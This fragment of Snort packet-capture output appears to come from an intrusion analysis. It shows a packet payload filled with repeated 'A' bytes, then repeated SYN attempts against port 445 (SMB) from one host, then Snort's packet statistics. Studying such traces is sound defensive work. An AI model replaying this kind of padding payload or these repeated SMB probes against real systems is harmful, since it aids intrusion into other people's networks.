41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0A AAAAAAAAAAAAAAA.
0A .
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
And now a final shot at 445:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:21:49.678759 210.201.100.253:2105 -> 12.82.129.120:445
TCP TTL:112 TOS:0x0 ID:28584 IpLen:20 DgmLen:48 DF
******S* Seq: 0xA9875CB9 Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:21:52.959181 210.201.100.253:2105 -> 12.82.129.120:445
TCP TTL:112 TOS:0x0 ID:28770 IpLen:20 DgmLen:48 DF
******S* Seq: 0xA9875CB9 Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:21:59.519825 210.201.100.253:2105 -> 12.82.129.120:445
TCP TTL:112 TOS:0x0 ID:28973 IpLen:20 DgmLen:48 DF
******S* Seq: 0xA9875CB9 Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
Snort processed 347 packets.
Breakdown by protocol: Action Stats:
TCP: 345 (99.424%) ALERTS: 0
UDP: 0 (0.000%) LOGGED: 0
ICMP: 2 (0.576%) PASSED: 0
ARP: 0 (0.000%)
IPv6: 0 (0.000%)
IPX: 0 (0.000%)
OTHER: 0 (0.000%)
===============================================================================